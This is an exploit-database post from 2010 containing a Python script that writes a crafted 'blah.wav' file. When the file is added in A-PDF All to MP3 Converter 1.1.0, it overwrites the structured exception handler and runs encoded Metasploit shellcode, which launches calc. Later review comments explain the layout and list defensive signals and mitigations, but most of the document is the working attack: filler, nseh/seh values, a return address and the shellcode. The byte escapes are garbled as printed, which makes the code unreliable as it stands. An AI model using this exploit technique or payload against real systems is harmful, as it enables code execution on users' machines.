
[local exploits] - A-PDF All to MP3 Converter v.1.1.0 Univer

Posted on 17 September 2010

# ==============================================================
# A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# ==============================================================
#!/usr/bin/python
################################################################################
# Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# Date: September 18, 2010
# Author: modpr0be
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 1.1.0
# Tested on: Windows XP SP3
#
# Open application --> Next --> Add --> blah.wav --> calc will pop out
#
# Other applications made by a-pdf may be affected.
# this exploit is simply reference from EDB 14681 and 14676
# Exploit using direct EIP is also working.
#
# thx: amalia, offsec, xecureit, jasakom, oebaj, 0x70y, postnix. 
################################################################################
#
# NOTE(review): what this script does, read from the code below: it
# concatenates a fixed-length filler, two short fields named `nseh` and `seh`,
# a padding run and an encoded payload, and writes the result to `blah.wav`.
# Per the author's header, adding that file in the converter (v1.1.0, tested on
# Windows XP SP3) ends with calc being launched, i.e. code execution in the
# context of the user who opened the file.
#
# NOTE(review): the 4132-byte filler ahead of the `nseh`/`seh` fields suggests
# file content is copied into a stack buffer without a length check, reaching a
# structured-exception-handler record -- TODO confirm; the page carries no
# root-cause analysis and no vendor fix reference.
#
# NOTE(review): defensive takeaways. Treat media files from untrusted sources
# as hostile input for this product; the header says other a-pdf applications
# may be affected. The generated file begins with a long run of 'A' bytes and
# not a RIFF header, so a "WAV" that fails basic container validation is a
# cheap triage signal. SafeSEH/SEHOP and DEP are the mitigations aimed at this
# class of handler overwrite; whether the target binary uses them is not shown
# here.
#
# NOTE(review): the byte escapes in the string literals are garbled as printed
# on this page. They are reproduced exactly as printed, so the literals are not
# byte-accurate and the sizes quoted in the comments do not describe them.
import struct

# Filler placed at the start of the file; the length is the author's constant.
junk1 = 'A' * 4132
# Field placed immediately before `seh`; the name suggests the "next record"
# slot of an exception-handler record.
nseh = "xebx06x90x90"
# Little-endian 32-bit pack of a fixed address ('<L'); "ppr" is the author's
# label, presumably a pop/pop/ret sequence -- not verifiable from this page.
seh = struct.pack('<L', 0x00408B44) # ppr
# Padding run placed between the `seh` field and the payload.
nops2 = "x90" * 12

# metasploit payload
# windows/exec cmd=calc | msfencode -e x86/alpha_upper
# size 462 bytes
# Encoded payload as printed on the page; the author's comments above give the
# generator and state that it launches calc as a proof of execution.
shellcode = ("x89xe1xdaxdexd9x71xf4x5ax4ax4ax4ax4ax4ax43x43"
"x43x43x43x43x52x59x56x54x58x33x30x56x58x34x41"
"x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42"
"x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50"
"x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30x43"
"x30x43x30x43x50x4cx49x4dx35x46x51x48x52x43x54"
"x4cx4bx50x52x50x30x4cx4bx46x32x44x4cx4cx4bx50"
"x52x44x54x4cx4bx44x32x51x38x44x4fx4ex57x50x4a"
"x51x36x50x31x4bx4fx50x31x49x50x4ex4cx47x4cx45"
"x31x43x4cx44x42x46x4cx47x50x49x51x48x4fx44x4d"
"x45x51x4fx37x4dx32x4cx30x46x32x51x47x4cx4bx46"
"x32x42x30x4cx4bx50x42x47x4cx43x31x48x50x4cx4b"
"x47x30x43x48x4dx55x49x50x44x34x51x5ax43x31x4e"
"x30x46x30x4cx4bx51x58x45x48x4cx4bx50x58x47x50"
"x45x51x48x53x4dx33x47x4cx51x59x4cx4bx50x34x4c"
"x4bx43x31x49x46x50x31x4bx4fx46x51x4fx30x4ex4c"
"x4fx31x48x4fx44x4dx43x31x49x57x47x48x4bx50x44"
"x35x4cx34x43x33x43x4dx4cx38x47x4bx43x4dx46x44"
"x42x55x4bx52x51x48x4cx4bx51x48x51x34x43x31x48"
"x53x45x36x4cx4bx44x4cx50x4bx4cx4bx50x58x45x4c"
"x43x31x48x53x4cx4bx45x54x4cx4bx45x51x4ex30x4b"
"x39x50x44x47x54x46x44x51x4bx51x4bx43x51x46x39"
"x50x5ax50x51x4bx4fx4bx50x50x58x51x4fx51x4ax4c"
"x4bx44x52x4ax4bx4dx56x51x4dx42x4ax43x31x4cx4d"
"x4cx45x48x39x43x30x45x50x43x30x50x50x43x58x50"
"x31x4cx4bx42x4fx4dx57x4bx4fx49x45x4fx4bx4cx30"
"x48x35x49x32x50x56x45x38x4ex46x4dx45x4fx4dx4d"
"x4dx4bx4fx48x55x47x4cx43x36x43x4cx45x5ax4bx30"
"x4bx4bx4bx50x42x55x43x35x4fx4bx47x37x45x43x42"
"x52x42x4fx43x5ax43x30x50x53x4bx4fx49x45x45x33"
"x45x31x42x4cx45x33x43x30x45x5ax41x41")

# File layout, in order: filler, nseh field, seh field, padding, payload.
payload = junk1+nseh+seh+nops2+shellcode
# Writes the assembled buffer to blah.wav in the current working directory.
file = open('blah.wav','w')
file.write(payload)
file.close()

# Inj3ct0r.com [2010-09-17]

 
